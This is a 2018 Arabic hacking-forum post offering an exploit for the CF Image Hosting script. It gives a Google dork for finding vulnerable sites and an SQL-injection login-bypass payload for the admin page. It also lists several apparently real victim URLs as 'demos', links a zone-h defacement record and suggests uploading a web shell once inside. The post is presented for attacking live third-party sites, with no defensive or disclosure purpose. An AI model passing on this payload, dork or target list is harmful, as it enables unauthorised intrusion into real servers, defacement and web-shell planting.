تذكرنــي
التسجيل التعليمات التقويم البحث مشاركات اليوم اجعل كافة الأقسام مقروءة



.:: قسم الثغرات ::. هذا القسم يختص باحدث الثغرات و طرق استغلالها ..

اضافة رد

 
أدوات الموضوع انواع عرض الموضوع

رقم المشاركة : ( 1 )
الصورة الرمزية Rednfozi
Rednfozi

Rednfozi غير متواجد حالياً
 
رقم العضوية : 66880
تاريخ التسجيل : Oct 2018
مكان الإقامة :
عدد المشاركات : 4
عدد النقاط : 10
قوة التقييم :
افتراضي Image Hosting script admin page bypass vulnerability / upload shell

كُتب : [ 10-01-2018 - 07:19 PM ]


كود PHP:
 ,--^----------,--------,-----,-------^--,

  | |||||||||   `
--------'     |          O .. by Rednofozi anonysec hackers iran  ..

  
`+---------------------------^----------|

    `
\_,-------, _________________________|

      / XXXXXX /
`|     /

     / 
XXXXXX /  `\   /

    / XXXXXX /\______(

   / XXXXXX /      

  / XXXXXX /

 (________(        

  
`------'

====================================================================================

# Exploit Title: Image Hosting script admin page bypass vulnerability / upload shell

# Exploit Author: Rednofozi

# Date:26-09-2018

# Email: [email protected]

# Vendor Homepage: www.codefuture.co.uk

# OUR SITE : https://anonysec.org

|====================================================================================

# {INFO}

# admin bypass Vulnerability

|====================================================================================

# {DORK}

# intext:"Powered By CF Image Hosting script

|====================================================================================

# {POC}

# admin page:

# site.com/admin

# exploit:

# Username: '
=''or'

# password: '
=''or'



# zone-h test hacked http://www.zone-h.org/mirror/id/31702111

|====================================================================================

# {DEMO}

# 01: http://www.irtci.ir/pic/admin.php

# 02: hhttp://image4web.net/admin/

# 03: https://admin.serconi.es/admin

# 04:  and  upload shell

# 05: 

# 06:

# 07:

# 08: 

# 09: 

# 10: 

|====================================================================================

# {TNX For}

# >>> Thanks To: ReZa CLONER  , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow

# >>> Discovered By :Rednofozi

|====================================================================================

The END ; Good Luck :D:D:D 

توقيع : Rednfozi



رد مع إقتباس
الأعضاء الذين آرسلوا آعجاب لـ Rednfozi على المشاركة المفيدة:
خالد هاك (10-02-2018)

اضافة رد

العلامات المرجعية


يتصفح الموضوع حالياً : 3 (0 قرصان و 3 ضيف)
 
أدوات الموضوع
انواع عرض الموضوع

ضوابط المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا يمكنك اضافة مرفقات
لا يمكنك تعديل مشاركاتك

BB code متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
SkaLinks Admin Page Bypass & Upload Shell MrKurd .:: قسم الثغرات ::. 3 11-22-2016 05:47 PM
ثغرات وورد برس من 3-4-2012 b0y h4ck3r .:: قسم الثغرات ::. 9 02-18-2014 12:27 AM
Google Dork Sql Injection, LFI 2012 abdulhakim1 .:: قسم الثغرات ::. 1 09-29-2012 01:19 AM
طلبتكم ابي لوحه تحكم هذا الموقع برشلوني هكر .:: قسم مساعدة الاعضاء ::. 5 07-07-2010 02:20 PM


جميع الأوقات بتوقيت GMT +2. الساعة الآن 03:35 PM.



أقسام المنتدى

الأقسام الإسلامية @ .:: القسم الإسلامي العام ::. @ .:: قسم القرآن الكريم وتجويده ::. @ .:: قسم الاناشيد والشريط الاسلامي ::. @ .:: سيرة و قصص الأنبياء و الصحابة ::. @ الأقسام العامة @ .:: قسم الساحة العامة ::. @ .:: قسم فـلـسـطــيــن ::. @ .:: قسم للتوعية الأمنية ::. @ .:: عالم البرامج الكاملة والنادرة ::. @ .:: قسم أخبار التقنية المعلوماتية والتكنولوجية ::. @ .:: قسم عالم المحادثة ::. @ .:: قسم الأمن و الحماية | Security ::. @ ::. قسم حماية الاجهزة والايميلات .:: @ ::. قسم حمايه المواقع والسيرفرات.:: @ ::. قسم إختراق المواقع والأجهزة والبريد الإلكتروني | Hacker .:: @ ::. قسم إختراق المواقع والمنتديات .:: @ ::.قسم إختراق الأجهزه والبريد الاكتروني .:: @ .:: قسم الثغرات ::. @ .:: الركن الترفيهي ::. @ .:: قسم الصور ::. @ .:: ركن الأدارية ::. @ .:: قسم الشكاوي ولأقتراحات ::. @ خاص بشروحات الفيديو @ الأدوات , hack tools @ .:: قسم مساعدة الاعضاء ::. @ :: المواضيع المحذوفة :: @ قسم الانجازات @ .:: جديد قراصنة غزة ::. @ :: قسم استراحة الأعضاء :: @ :: YouTube :: @ .:: القسم التقني ::. @ :: عالمـ الكومبيوتر :: @ :: قسم الجوالات والاتصالات :: @ :: قسم التصميم والغرافيك :: @ خاص للادارة والمشرفين @ :: قسم خاص بالمبتدئين :: @ :: خاص بثغرات المتصفح :: @ :: خاص بشروحات الفيديو :: @ .:: الدورات المقدمة من المشرفين ::. @ :: مشآكل الكومبيوتر وحلولها :: @ .:: للنقاش الجاد ::. @ الملتقى الأدبي .. @ :: طلبات الإشراف :: @ :: كتب الحماية والاختراق security&hacking :: @ البحوث العلمية @ تعليم اللغات الأجنبية @ .:: كتب الكترونية منوعة ::. @ .:: القسم الدعوي ::. @ قسم الكتب الاسلامية @ قسم المواضيع المميزة @ :: قسم خاص بالتشفير :: @ قسم اخبار العالم وقضايا الأمة الإسلامية @ Local root @ دورة إحترآف إلـ Spam Email @ فلسطين , palestine @ .:: مدن وقرى فلسطين ::. @ .:: تاريخ فلسطين ::. @ .:: شهداء فلسطين ::. @ .:: مدينة القدس ::. @ .:: مدينة غزة ::. @ .:: لعروض التصاميم ::. @ .:: لدروس التصاميم ::. @ :: قسم اصدارات وانجازات الفريق :: @ .:: قسم قضية فلسطين ::. @ .:: قسم عروض الاستايلات :.. @ قسم اخبار وقضايا اليهود @ .:: قسم الهاكات وتطوير المنتديات ::. @ ::. قسم المسابقات والنشاطات .:: @ لوحة تحكم سي بانل , cPanel Management @ حماية قواعد البيانات mysql , sql @ لوحة تحكم , Plesk Management @ ادارة سيرفرات Linux @ .:: SQL-injection , حقن قواعد بيانات ::. @ :: قسم خاص بالمبتدئين :: @ .:: قسم الكتب الالكترونية E-BOOK ::. @ .:: قسم تفسير القران الكريم ::. @ قسم الدفاع عن النبي محمد والصحابة وآل البيت @ .:: قسم لغات البرمجة ::. @ قسم برمجة لغة Php , Html @ قسم برمجة لغة mysql , sql @ .:: القسم الرمضانى ::. @ جديد الشيخ نبيل العوضى @ حجب الخدمة , ddos attack @ قسم الاختراق المتقدم @ .:: حماية الاجهزة وطرق كشف التلغيم ::. @ .:: قسم حماية الايميلات :. @ قسم اختراق سيرفرات windows @ .:: دورة قراصنة غزة للتصميم ::. @ .::: أسرى فلسطين ::. @ مدرسة قراصنة غزة لحقن قواعد البيانات @ ::. قسم مشروع الباك تراك backtrack , الميتاسبلويت MetaSploit .:: @ فريق :: Gaza HaCker Injector Team-GHI :: @ دورة أساتذة حقن قواعد البيانات المتقدمة لعام 2017 / 2018 @ GH-InjeCtor-Team @ .:: قسم الصلاة ثم الصلاة ::. @ وَحَرِّضِ الْمُؤْمِنِينَ @ قسم انظمة لينكس Linux, Unix @ قسم الالعاب الالكترونية @ قسم اختراق الشبكات السلكية واللاسلكية @ قسم الميكاترونكس (بناء الروبوتات) @ قسم الدورات المدفوعة @ قسم اختراق الاجهزة اللوحية @ دورات حقن قواعد البيانات للمٌبتدئين من الألف إلى الإحتراف @ قسم الحقن المٌتقَدِّم [بداية العهد] @